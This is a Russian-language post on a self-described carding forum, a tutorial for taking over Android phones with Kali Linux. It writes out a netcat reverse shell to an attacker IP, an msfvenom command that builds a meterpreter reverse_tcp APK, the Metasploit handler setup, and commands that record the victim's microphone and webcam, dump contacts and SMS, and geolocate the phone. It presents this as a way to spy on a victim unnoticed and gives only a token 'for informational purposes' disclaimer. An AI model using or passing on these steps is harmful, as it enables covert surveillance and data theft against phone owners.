Привет, гость!

Добро пожаловать на CVVBOARD - крупнейший теневой кардинг форум. У нас Вы сможете найти огромное множество статей по теме кардинга и заработка в интернете. Актуальная информация, новости даркнета, сервисы от проверенных продавцов, эксклюзивные, только рабочие схемы заработка, ежедневные раздачи - все это Вы найдете на нашем форуме! Не пренебрегайте услугами Гарант-Сервиса это убережет Вас от мошенников. Обратите внимание, звание модератора не является гарантом в сделках!

Получаем доступ к Android [Kali Linux]

Hyper.png

Опытный user
Регистрация
16 Ноя 2018
Сообщения
65
Реакции
5
Только для ознакомительных целях, дабы бы не попались на это!

Принцип работы

Простыми словами, сначала создадем приложение(payload), в конце у нас будет сессия meterpreter. Все операции выполняются с помощью утилит на базе операционной системы Kali Linux.

Принцип работы проще всего понять на примере двух окон терминала. Представим, что это жертва и хакер. Последний запускает в себя команду в терминале:

nc -l -p 8577
Жертва в свою очередь подключается к этому открытому порту:

nc 192.168.1.1 8577 -e /bin/bash
Таким образом, произошло подключение к открытому порту. Теперь в первом терминале можно запустить несколько команд, которые можно использовать на машине жертвы.

Вот по такому принципу мы будет работать с android. Принцип работы с payload может быть намного сложнее, но в этом основная суть.

Создание payload

Открываем терминал и с помощью такого набора создаем приложение с расширением. apk, которое будет доступно в корневой директории. Вместо звездочки нужно указать свой IP. Можно быстро посмотреть в терминале с помощью команды ifconfig:

msfvenom -p android/meterpreter/reverse_tcp LHOST=* LPORT=4444 R >shell.apk
После выполнения команды в корневой директории будет создан файл shell.apk.

410f31c814ce727d293c7.png

Далее необходимо запустить msfconsole.

msfconsole
После этого последовательно выполняем все команды:

use exploit/multi/handlerset payload android/meterpreter/reverse_tcpset LHOST ВашIPset LPORT 4444exploit
После этого, человек должен запусить shell.apk.

Некоторые полезные команды:

record_micwebcam_snapwebcam_streamdump_contactsdump_smsgeolocate
После установления сессии на телефоне не происходит никаких действий. Можно спокойно удаленно следить за жертвой, если у нее будет активное интернет соединение.
 

^Terminal^

Интересующийся
Регистрация
18 Ноя 2018
Сообщения
55
Реакции
3
С помощью Кали многое можно сделать.
 
Сверху Снизу